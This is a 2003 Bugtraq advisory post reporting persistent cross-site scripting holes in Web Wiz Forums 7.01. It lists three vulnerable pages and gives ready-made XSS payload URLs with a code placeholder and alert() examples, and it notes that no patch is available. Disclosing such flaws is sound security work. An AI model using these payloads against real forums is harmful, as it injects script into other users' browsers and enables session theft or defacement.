Bugtraq mailing list archives
Web Wiz Forums ver. 7.01
From: HEX <hex () hex net ru>
Date: Wed, 22 Oct 2003 00:41:35 +0400
Informations : °°°°°°°°°°°° Language : ASP Bugged Version : Web Wiz Forums ver. 7.01 (and less ?) Patched version : none Website : http://www.webwizforums.com Problems : Permanent XSS Objects : °°°°°°° - forum_members.asp - members.asp - pm_buddy_list.asp Exploits : °°°°°°°° http://[TARGET]/forum_members.asp?find=%22;}[CODE];function%20x(){v%20=%22 Example: http://[TARGET]/forum_members.asp?find=%22;}ALERT('XSS atack by [HEX] (c) [CSL]');function%20x(){v%20=%22 http://[TARGET]/members.asp?SF=%22;}[CODE]function%20x(){v%20=%22 Example: http://[TARGET]/members.asp?SF=%22;}ALERT('XSS atack by [HEX] (c) [CSL]');function%20x(){v%20=%22 http://[TARGET]/pm_buddy_list.asp?name=A&desc=B%22%3E[CODE]%3Ca%20s=%22&code=1 Example: http://[TARGET]/pm_buddy_list.asp?name=A&desc=B%22%3E<SCRIPT>ALERT('XSS atack by [HEX] (c) [CSL]');</SCRIPT>%3Ca%20s=%22&code=1 Patch/More Details : °°°°°°°°°°°°°°°°°° Waiting for the patch at http://www.webwizforums.com... [ Local time 2:30 | Если б мишки были пчелами... ] [ Copyright by [HEX] | mailto:hex () hex net ru ]
Current thread:
- Web Wiz Forums ver. 7.01 HEX (Oct 21)
- <Possible follow-ups>
- Re: Web Wiz Forums ver. 7.01 bruce (Oct 22)